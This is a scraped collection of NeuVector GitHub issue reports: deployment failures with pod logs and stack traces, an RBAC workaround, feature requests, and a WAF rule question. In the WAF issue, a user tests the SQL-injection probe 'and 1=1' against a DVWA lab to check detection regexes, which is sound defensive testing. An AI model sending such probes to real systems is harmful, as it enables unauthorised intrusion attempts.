Pods come up successfully

Screenshots
If applicable, add screenshots to help explain your problem.

N/A

UI Issue
Desktop (please complete the following information):**

  • OS: [e.g. MacOs 12.1, Windows 10]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

N/A

Additional context
Add any other context about the problem here.

LDAP/AD Authenticated Users Unable to Give Namespaced Access to Role

We are wanting to run neuvector on a multi-tenancy Kubernetes cluster using Active Directory to authenticate users and construct a specific role for them which gives them read access to runtime scanning of objects just in their namespace.

This is possible if we manually create a user using the web ui:
Screenshot 2022-02-18 at 11 14 56

If a user is created using integration with AD no such option is available. We are only permitted to set a Global role:

Screenshot 2022-02-18 at 11 17 00

allinone on k3s: Cannot find container runtime socket

Allinone pod fails to fully start: Running 0/1

NeuVector 5.0.0-preview
k3s v1.22.6+k3s1

Runtime location:
ll /run/k3s/containerd/containerd.sock
srw-rw---- 1 root root 0 Feb 8 00:06 /run/k3s/containerd/containerd.sock

yaml configuration:
grep .sock neuvector.yaml

    - mountPath: /run/k3s/containerd/containerd.sock
              name: runtime-sock
        - name: runtime-sock
            path: /run/k3s/containerd/containerd.sock
            - mountPath: /run/k3s/containerd/containerd.sock
              name: runtime-sock
        - name: runtime-sock
            path: /run/k3s/containerd/containerd.sock

Full pod describe:

Name:         neuvector-allinone-pod-gfqrh
Namespace:    neuvector
Priority:     0
Node:         control01/172.30.0.21
Start Time:   Tue, 08 Feb 2022 00:16:03 -0700
Labels:       app=neuvector-allinone-pod
              controller-revision-hash=6bd8989db5
              pod-template-generation=1
Annotations:  <none>
Status:       Running
IP:           10.42.0.24
IPs:
  IP:           10.42.0.24
Controlled By:  DaemonSet/neuvector-allinone-pod
Containers:
  neuvector-allinone-pod:
    Container ID:   containerd://8e39e0b008d4b2f13f79ad164c6174dc940941d073923349056ca304cea6f812
    Image:          neuvector/allinone.preview:5.0.0-preview.1
    Image ID:       docker.io/neuvector/allinone.preview@sha256:f288c606767616fc0c5e5081c45300e14173bbedc960e4b54acbeae513a4bc64
    Port:           <none>
    Host Port:      <none>
    State:          Running
      Started:      Tue, 08 Feb 2022 00:16:04 -0700
    Ready:          False
    Restart Count:  0
    Readiness:      exec [cat /tmp/ready] delay=5s timeout=1s period=5s #success=1 #failure=3
    Environment:
      CLUSTER_JOIN_ADDR:        neuvector-svc-allinone.neuvector
      CLUSTER_ADVERTISED_ADDR:   (v1:status.podIP)
      CLUSTER_BIND_ADDR:         (v1:status.podIP)
    Mounts:
      /etc/config from config-volume (ro)
      /host/cgroup from cgroup-vol (ro)
      /host/proc from proc-vol (ro)
      /lib/modules from modules-vol (ro)
      /run/k3s/containerd/containerd.sock from runtime-sock (ro)
      /var/neuvector from nv-share (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-94rjd (ro)
Conditions:
  Type              Status
  Initialized       True 
  Ready             False 
  ContainersReady   False 
  PodScheduled      True 
Volumes:
  modules-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /lib/modules
    HostPathType:  
  nv-share:
    Type:          HostPath (bare host directory volume)
    Path:          /var/neuvector
    HostPathType:  
  runtime-sock:
    Type:          HostPath (bare host directory volume)
    Path:          /run/k3s/containerd/containerd.sock
    HostPathType:  
  proc-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /proc
    HostPathType:  
  cgroup-vol:
    Type:          HostPath (bare host directory volume)
    Path:          /sys/fs/cgroup
    HostPathType:  
  config-volume:
    Type:      ConfigMap (a volume populated by a ConfigMap)
    Name:      neuvector-init
    Optional:  true
  kube-api-access-94rjd:
    Type:                    Projected (a volume that contains injected data from multiple sources)
    TokenExpirationSeconds:  3607
    ConfigMapName:           kube-root-ca.crt
    ConfigMapOptional:       <nil>
    DownwardAPI:             true
QoS Class:                   BestEffort
Node-Selectors:              nvallinone=true
Tolerations:                 node.kubernetes.io/disk-pressure:NoSchedule op=Exists
                             node.kubernetes.io/memory-pressure:NoSchedule op=Exists
                             node.kubernetes.io/not-ready:NoExecute op=Exists
                             node.kubernetes.io/pid-pressure:NoSchedule op=Exists
                             node.kubernetes.io/unreachable:NoExecute op=Exists
                             node.kubernetes.io/unschedulable:NoSchedule op=Exists
Events:
  Type     Reason     Age                    From               Message
  ----     ------     ----                   ----               -------
  Normal   Scheduled  17m                    default-scheduler  Successfully assigned neuvector/neuvector-allinone-pod-gfqrh to control01
  Normal   Pulled     17m                    kubelet            Container image "neuvector/allinone.preview:5.0.0-preview.1" already present on machine
  Normal   Created    17m                    kubelet            Created container neuvector-allinone-pod
  Normal   Started    17m                    kubelet            Started container neuvector-allinone-pod
  Warning  Unhealthy  2m19s (x192 over 17m)  kubelet            Readiness probe failed: cat: can't open '/tmp/ready': No such file or directory

Full pod log:

2022-02-08 07:16:05,177 CRIT Supervisor is running as root.  Privileges were not dropped because no user is specified in the config file.  If you intend to run as root, you can set user=root in the config file to avoid this message.
2022-02-08 07:16:05,179 INFO supervisord started with pid 12696
2022-02-08 07:16:06,184 INFO spawned: 'manager' with pid 12920
2022-02-08 07:16:06,189 INFO spawned: 'monitor' with pid 12921
2022-02-08 07:16:06,202 DEBG 'monitor' stdout output:
2022-02-08T07:16:06|MON|/usr/local/bin/monitor starts, pid=12921

2022-02-08 07:16:06,205 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:06,207 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:06,207 DEBG 'monitor' stdout output:
2022-02-08T07:16:06|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:06,208 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425664 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:06,208 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:06,208 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:07,210 INFO success: manager entered RUNNING state, process has stayed up for > than 1 seconds (startsecs)
2022-02-08 07:16:07,211 INFO spawned: 'monitor' with pid 12986
2022-02-08 07:16:07,215 DEBG 'monitor' stdout output:
2022-02-08T07:16:07|MON|/usr/local/bin/monitor starts, pid=12986

2022-02-08 07:16:07,216 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:07,218 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:07,218 DEBG 'monitor' stdout output:
2022-02-08T07:16:07|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:07,218 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425712 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:07,218 DEBG fd 9 closed, stopped monitoring <POutputDispatcher at 140170418425664 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stdout)>
2022-02-08 07:16:07,218 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:07,218 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:07,229 DEBG 'manager' stdout output:
2022-02-08 07:16:07,227|INFO |MANAGER|com.neu.web.Rest$(sslContext:32): Import manager's certificate and private key to manager's keystore

2022-02-08 07:16:07,235 DEBG 'manager' stdout output:
2022-02-08 07:16:07,234|INFO |MANAGER|com.neu.web.Rest$(sslContext:54): PKCS#8 private key is being used

2022-02-08 07:16:08,710 DEBG 'manager' stdout output:
2022-02-08 07:16:08,708|INFO |MANAGER|akka.actor.DeadLetterActorRef(apply$mcV$sp:74): Message [akka.io.Tcp$Bound] from Actor[akka://manager-system/user/IO-HTTP/listener-0#540477287] to Actor[akka://manager-system/deadLetters] was not delivered. [1] dead letters encountered. This logging can be turned off or adjusted with configuration settings 'akka.log-dead-letters' and 'akka.log-dead-letters-during-shutdown'.

2022-02-08 07:16:09,715 INFO spawned: 'monitor' with pid 13028
2022-02-08 07:16:09,728 DEBG 'monitor' stdout output:
2022-02-08T07:16:09|MON|/usr/local/bin/monitor starts, pid=13028

2022-02-08 07:16:09,730 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:09,733 DEBG 'monitor' stdout output:
Cannot find container runtime socket

2022-02-08 07:16:09,733 DEBG 'monitor' stdout output:
2022-02-08T07:16:09|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:09,733 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425520 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:09,734 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:09,734 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:12,742 INFO spawned: 'monitor' with pid 13045
2022-02-08 07:16:12,757 DEBG 'monitor' stdout output:
2022-02-08T07:16:12|MON|/usr/local/bin/monitor starts, pid=13045

2022-02-08 07:16:12,763 DEBG 'monitor' stdout output:
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64

2022-02-08 07:16:12,766 DEBG 'monitor' stdout output:
Cannot find container runtime socket
2022-02-08T07:16:12|MON|Initial configuration failed rc=3. Exit!

2022-02-08 07:16:12,766 DEBG fd 9 closed, stopped monitoring <POutputDispatcher at 140170418425520 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stdout)>
2022-02-08 07:16:12,767 DEBG fd 13 closed, stopped monitoring <POutputDispatcher at 140170418425568 for <Subprocess at 140170418374304 with name monitor in state STARTING> (stderr)>
2022-02-08 07:16:12,767 INFO exited: monitor (exit status 3; not expected)
2022-02-08 07:16:12,767 DEBG received SIGCHLD indicating a child quit
2022-02-08 07:16:12,768 INFO gave up: monitor entered FATAL state, too many start retries too quickly

memory usage too high

Environment
Platform: [e.g. Kubernetes, OpenShift, Rancher, Managed k8s (AKS, EKS, GKE, IKS, ...), ...]
Kubernetes/Platform Version(s):

1.20.4-aliyun.1

Describe the bug
A clear and concise description of what the bug is. (If you are encountering a deployment error, check out the README or navigate to https://open-docs.neuvector.com for full deployment documentation. Incorrect runtime is the most common reason for Controller and Enforcer CrashLoopBackOff events.)

image

memory usage too high

To Reproduce
Steps to reproduce the behavior:

2022-04-07T10:36:44.15 |INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done
2022-04-07T10:37:07|DEBU|dp0|dp_data_thr: epoll error: /host/proc/3631255/ns/net-eth0
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:37:20.452|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp: no such file or directory
2022-04-07T10:37:20.453|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:37:47.541|ERRO|AGT|main.updateContainerNetworks: Error reading container network endpint - container=lb-none endpoint=none-endpoint error=Not found
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/udp: no such file or directory
2022-04-07T10:38:08.115|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3631255/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:38:08.194|INFO|AGT|main.taskAddContainer: - id=ae98a232623f98f38c5df29b3a9f44a8382b70f3d7a3edda4367ee56046489e0 name=b9555b6dd-zjp78_871538d8-8e9b-449a-8255-6d7e530bcca3_0
2022-04-07T10:38:20.718|INFO|AGT|main.(*Bench).doDockerContainerBench: Running benchmark checks done
2022-04-07T10:38:20.725|INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done
2022-04-07T10:38:22.663|INFO|AGT|main.(*TaskScanner).scanSecretLoop: SCRT: in progress ...
2022-04-07T10:38:35.739|INFO|AGT|system.(*SystemTools).CGroupMemoryStatReset: - threshold=2080374784 usage=4770603008
2022-04-07T10:38:35.739|ERRO|AGT|system.(*SystemTools).CGroupMemoryStatReset.func1: - err=write /sys/fs/cgroup/memory/memory.force_empty: device or resource busy
2022-04-07T10:38:36.663|INFO|AGT|main.(*TaskScanner).scanSecretLoop: SCRT: done - Finished=1 TimeUsed=13.999985626s
2022-04-07T10:39:44.852|INFO|AGT|main.taskStopContainer: - c.pid=3632603 container=3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401 pid=0
2022-04-07T10:39:44.853|ERRO|AGT|main.taskStopContainer: Failed to read container. Use cached info. - error=No such container: 3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401
 id=3ffa5f5f4db8eb3550cb757b0df154b3c0dda18b2af5d44b0f7e335edd75e401
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/tcp6: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp: no such file or directory
2022-04-07T10:39:45.088|ERRO|AGT|osutil.getCGroupSocketTable: open net/tcp,udp - error=open /proc/3632603/root/proc/1/net/udp6: no such file or directory
2022-04-07T10:39:46.071|INFO|AGT|main.taskStopContainer: - c.pid=3631255 container=f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83 pid=0
2022-04-07T10:39:46.071|ERRO|AGT|main.taskStopContainer: Failed to read container. Use cached info. - error=No such container: f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83
 id=f59b29c5c55b7d011f102b050867f2a072357495dbadc9cc419855b47d2eed83
2022-04-07T10:39:56.127|INFO|AGT|main.(*Bench).doDockerContainerBench: Running benchmark checks done
2022-04-07T10:39:56.13 |INFO|AGT|main.(*Bench).doContainerCustomCheck: Running benchmark checks done```

**Expected behavior**
A clear and concise description of what you expected to happen.

**Screenshots**
If applicable, add screenshots to help explain your problem.

**UI Issue**
Desktop (please complete the following information):**
 - OS: [e.g. MacOs 12.1, Windows 10]
 - Browser [e.g. chrome, safari]
 - Version [e.g. 22]

**Additional context**
Add any other context about the problem here.

Neuvector images built for Apple aarm64

Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

linux/arm64 images would allow local development / testing of Neuvector on Apple Mac M1 line of laptops and servers (i.e. Studio offers plenty of capacity)

Describe the solution you'd like
A clear and concise description of what you want to happen.

Publish an image for arm64 to Docker Hub or expose build system so others can build locally

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

I have put in a support ticket for our commercial license and this is being considered by Product Team. Opens-sourcing of build tools might allow this happen faster.

Additional context
Add any other context or screenshots about the feature request here.

Not expecting this to be a production support configuration but local K8s development (KinD on Podman) offers reasonable local configuration for setup and testing.

dp directory compilation makefile error:

Hello, my centos environment in the dp directory compilation makefile error:
struct tcphdr' has no member named 'th_seq'
Have you ever encountered this problem? Is there a solution? Thank you very much!

WAF Sensors can not match the rule

Environment
Platform: K8s
Kubernetes/Platform Version(s): v1.19.1
Neuvector Version: preview-3

Describe the bug
I'm not sure if this is a bug,maybe it is my configuration issue;
I have configure rgxp to waf sensors,like this:
image
we can see that "and 1=1" can matched rgxp .

Then i add this policy to dvwa group:
image

Then i access dvwa and test it,but the payload can not match the waf rule.
image
I want to know why,who can tell me the reason or principle,there are many rgxp that come from imperva signature can not match the waf sensors rule.
The rgxp come from imperva waf signature,imperva waf can matched it.

Thanks!

The API document of NeuVector

Is your feature request related to a problem? Please describe.
the source code of rest API shows the usage of each request, but I can't find the corresponding http request in the front page.So it's hard for me to understand the real purpose of each request.
Describe the solution you'd like
where is the API document that i can infer?

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

Additional context
Add any other context or screenshots about the feature request here.

RBAC error preview 3

Environment
Platform: AWS EC2
Kubernetes/Platform Version(s): k3s 1.23.4

Describe the bug
Kubernetes clusterrole "neuvector-binding-nvdlpsecurityrules" is required to grant delete,list permission(s) on nvdlpsecurityrules resource(s).

Cannot find Kubernetes clusterrolebinding "neuvector-binding-nvdlpsecurityrules"(kubernetes api: Failure 404 clusterrolebindings.rbac.authorization.k8s.io "neuvector-binding-nvdlpsecurityrules" not found).

To Reproduce
Steps to reproduce the behavior:

  1. Install via helm
  2. login

Expected behavior
No errors appear

Workaround (provided by FM)
Resolved by applying the dlp CRD YAML
kubectl apply -f https://raw.githubusercontent.com/neuvector/manifests/main/kubernetes/5.0.0/dlp-crd-k8s-1.19.yaml

Create the ClusterRole:
kubectl create clusterrole neuvector-binding-nvdlpsecurityrules --verb=list,delete --resource=nvdlpsecurityrulesand
Creating the ClusterRoleBinding with:
kubectl create clusterrolebinding neuvector-binding-nvdlpsecurityrules --clusterrole=neuvector-binding-nvdlpsecurityrules --serviceaccount=neuvector-system:default

k8s安装提示无法连接8500端口

2022-02-23T06:45:04|MON|/usr/local/bin/monitor starts, pid=1
2022-02-23T06:45:04|MON|Start ctrl, pid=7
2022-02-23T06:45:04.678|INFO|CTL|main.main: START - version=v5.0.0-preview.1
2022-02-23T06:45:04.678|INFO|CTL|main.main: - join=neuvector-svc-controller.neuvector
2022-02-23T06:45:04.678|INFO|CTL|main.main: - advertise=10.244.1.76
2022-02-23T06:45:04.678|INFO|CTL|main.main: - bind=10.244.1.76
2022-02-23T06:45:04.681|INFO|CTL|system.NewSystemTools: cgroup v1
2022-02-23T06:45:04.681|INFO|CTL|container.Connect: - endpoint=
2022-02-23T06:45:04.681|WARN|CTL|container.parseEndpointWithFallbackProtocol: no error unix /run/containerd/containerd.sock.
2022-02-23T06:45:04.682|ERRO|CTL|container.containerdConnect: cri info - error=rpc error: code = Unimplemented desc = unknown service runtime.v1alpha2.RuntimeService
2022-02-23T06:45:04.682|INFO|CTL|container.containerdConnect: containerd connected - endpoint=/run/containerd/containerd.sock version={Version:1.4.12 Revision:7b11cfaabd73bb80907dd23182b9347b4245eb5d}
2022-02-23T06:45:04.713|ERRO|CTL|global.getVersion: - code=403 tag=oc
2022-02-23T06:45:04.728|ERRO|CTL|global.getVersion: - code=403 tag=oc
2022-02-23T06:45:04.728|INFO|CTL|main.main: Container socket connected - endpoint= runtime=containerd
2022-02-23T06:45:04.728|INFO|CTL|main.main: - k8s=1.23.3 oc=
2022-02-23T06:45:04.728|ERRO|CTL|container.(*containerdDriver).GetContainer: Failed to get container - error=container "6dd53049065f54334497ebbe7bc888c30c5ddd4c26cdbd2e61a6291fd17b9b35" in namespace "k8s.io": not found
2022-02-23T06:45:04.728|ERRO|CTL|main.main: Failed to get local device information - error=not found
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.init
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/errors.go:41
runtime.doInit
/usr/local/go/src/runtime/proc.go:5480
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.doInit
/usr/local/go/src/runtime/proc.go:5475
runtime.main
/usr/local/go/src/runtime/proc.go:190
runtime.goexit
/usr/local/go/src/runtime/asm_amd64.s:1373
container "6dd53049065f54334497ebbe7bc888c30c5ddd4c26cdbd2e61a6291fd17b9b35" in namespace "k8s.io"
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.FromGRPC
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/grpc.go:98
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*remoteContainers).Get
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/containerstore.go:50
github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*Client).LoadContainer
/go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/client.go:248
github.com/neuvector/neuvector/share/container.(*containerdDriver).GetContainer
/go/src/github.com/neuvector/neuvector/share/container/containerd.go:294
github.com/neuvector/neuvector/share/container.getDevice
/go/src/github.com/neuvector/neuvector/share/container/common.go:191
github.com/neuvector/neuvector/share/container.(*containerdDriver).GetDevice
/go/src/github.com/neuvector/neuvector/share/container/containerd.go:121
main.getLocalInfo
/go/src/github.com/neuvector/neuvector/controller/controller.go:91
main.main
/go/src/github.com/neuvector/neuvector/controller/controller.go:325
runtime.main
/usr/local/go/src/runtime/proc.go:203
runtime.goexit
/usr/local/go/src/runtime/asm_amd64.s:1373
2022-02-23T06:45:04|MON|Process ctrl exit status 254, pid=7
2022-02-23T06:45:04|MON|Process ctrl exit with non-recoverable return code. Monitor Exit!!
Leave the cluster
Error leaving: Put http://127.0.0.1:8500/v1/agent/leave: dial tcp 127.0.0.1:8500: connect: connection refused
2022-02-23T06:45:04|MON|Clean up.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.